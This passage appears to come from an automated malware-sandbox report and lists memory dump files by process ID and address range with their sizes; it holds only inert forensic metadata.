                      1.3MB

                    • memory/4532-150-0x000000001D7B0000-0x000000001D900000-memory.dmp

                      Filesize

                      1.3MB

                    • memory/4532-148-0x000000001D7B0000-0x000000001D900000-memory.dmp

                      Filesize

                      1.3MB

                    • memory/4532-176-0x000000001D7B0000-0x000000001D900000-memory.dmp

                      Filesize

                      1.3MB

                    • memory/4532-178-0x000000001D7B0000-0x000000001D900000-memory.dmp

                      Filesize

                      1.3MB

                    • memory/4532-188-0x000000001D7B0000-0x000000001D900000-memory.dmp

                      Filesize

                      1.3MB

                    • memory/4532-180-0x000000001D7B0000-0x000000001D900000-memory.dmp

                      Filesize

                      1.3MB

                    • memory/4532-190-0x000000001D7B0000-0x000000001D900000-memory.dmp

                      Filesize

                      1.3MB

                    • memory/4532-134-0x0000000004DA0000-0x0000000004DB0000-memory.dmp

                      Filesize

                      64KB

                    • memory/4532-135-0x000000001D7B0000-0x000000001D900000-memory.dmp

                      Filesize

                      1.3MB

                    • memory/4532-133-0x0000000000140000-0x0000000002A08000-memory.dmp

                      Filesize

                      40.8MB

                    • memory/4532-182-0x000000001D7B0000-0x000000001D900000-memory.dmp

                      Filesize

                      1.3MB

                    • memory/4532-136-0x000000001D7B0000-0x000000001D900000-memory.dmp

                      Filesize

                      1.3MB

                    • memory/4532-170-0x000000001D7B0000-0x000000001D900000-memory.dmp

                      Filesize

                      1.3MB

                    • memory/4532-138-0x000000001D7B0000-0x000000001D900000-memory.dmp

                      Filesize

                      1.3MB

                    • memory/4532-140-0x000000001D7B0000-0x000000001D900000-memory.dmp

                      Filesize

                      1.3MB

                    • memory/4532-192-0x000000001D7B0000-0x000000001D900000-memory.dmp

                      Filesize

                      1.3MB

                    • memory/4532-146-0x000000001D7B0000-0x000000001D900000-memory.dmp

                      Filesize

                      1.3MB

                    • memory/4532-144-0x000000001D7B0000-0x000000001D900000-memory.dmp

                      Filesize

                      1.3MB

                    • memory/4532-142-0x000000001D7B0000-0x000000001D900000-memory.dmp

                      Filesize

                      1.3MB

                    • memory/4532-948-0x0000000004DA0000-0x0000000004DB0000-memory.dmp

                      Filesize

                      64KB

                    • memory/4532-198-0x000000001D7B0000-0x000000001D900000-memory.dmp

                      Filesize

                      1.3MB

                    • memory/4532-196-0x000000001D7B0000-0x000000001D900000-memory.dmp

                      Filesize

                      1.3MB

                    • memory/4532-194-0x000000001D7B0000-0x000000001D900000-memory.dmp

                      Filesize

                      1.3MB

                    • memory/4572-9090-0x00007FF703550000-0x00007FF703CED000-memory.dmp

                      Filesize

                      7.6MB

                    • memory/4608-9048-0x000001E2F1990000-0x000001E2F19B0000-memory.dmp

                      Filesize

                      128KB

                    • memory/4608-9041-0x000001E2F1950000-0x000001E2F1990000-memory.dmp

                      Filesize

                      256KB

                    • memory/4608-9052-0x000001E2F1990000-0x000001E2F19B0000-memory.dmp

                      Filesize

                      128KB

                    • memory/5004-8724-0x0000000000400000-0x000000000043C000-memory.dmp

                      Filesize

                      240KB

                    • memory/5004-8726-0x0000000005B00000-0x0000000005B66000-memory.dmp

                      Filesize

                      408KB

                    • memory/5004-8742-0x0000000005860000-0x00000000058F2000-memory.dmp

                      Filesize

                      584KB

                    • memory/5004-8785-0x0000000006220000-0x00000000067C4000-memory.dmp

                      Filesize

                      5.6MB

                    • memory/5004-8871-0x00000000052E0000-0x00000000052EA000-memory.dmp

                      Filesize

                      40KB

                    • memory/5004-8725-0x0000000005280000-0x0000000005290000-memory.dmp

                      Filesize

                      64KB

                    • memory/5004-8872-0x0000000005320000-0x0000000005332000-memory.dmp

                      Filesize

                      72KB

                    • memory/5004-8882-0x0000000005280000-0x0000000005290000-memory.dmp

                      Filesize

                      64KB

                    • memory/5004-8893-0x0000000005280000-0x0000000005290000-memory.dmp

                      Filesize

                      64KB